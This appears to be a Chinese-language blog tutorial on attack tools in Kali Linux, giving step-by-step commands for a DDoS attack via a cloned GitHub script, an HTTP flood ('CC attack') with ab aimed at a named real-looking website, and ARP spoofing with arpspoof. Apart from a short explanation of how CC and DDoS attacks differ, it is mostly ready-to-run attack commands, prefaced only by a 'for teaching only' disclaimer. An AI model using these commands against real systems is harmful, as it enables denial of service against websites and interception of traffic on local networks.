kali必杀器之三剑客

Kali常见攻击手段

    注意:仅用于教程和科普，切勿做违法之事，否则后果自负

1 网络攻击手段

    请正确使用DDos和CC攻击，不要用来做违反当地法律法规的事情，否则后果自负

        使用之前kali需要能够上网
        参考:kali安装

1.1 DDos攻击

    打开命令行，下载对应ddos数据包

git clone https://github.com/Andysun06/ddos

    1

    进入数据包对应的文件夹（区分大小写）

cd ddos

    1

    执行脚本
    本文用于演示的kali是2020年版本，用python执行ddos-p2.py，输入命令：

python ddos-p2.py

二 cc

ab -n 参数1 -c 参数2 网站地址

参数一是并发数（请求的用户量）
参数二是发送总量（请求的总次数）
（有兴趣的可以在百度上另外学习）
参数1，参数2和网站地址由自己设置，这里以 1000，1000，http://bjvcrrn.nat.ipyingshe.com/bbs/ 为例：
出现如下界面表示攻击成功：

DDos与CC攻击区别：
1，CC攻击（流量不大，真实IP）
通常是应用层攻击，攻击对象是网页，涉及的协议主要是HTTP，HTTPS，消耗的是服务器的CPU资源（通过请求大量调用CPU的资源，例如查询数据库）
2，DDOS攻击（流量很大，伪造IP）
通常是网络层和传输层，攻击对象是IP，涉及协议主要是IP，UDP和TCP，通常消耗的是网络带宽

三arp欺骗

apt-get install dsniff -y

ifconfig

例如我的IP是192.168.145.98，命令就是fping -g 192.168.145.98/24

arpspoof -i 你的网卡名称 -t 攻击目标的IP地址 攻击目标的网关地址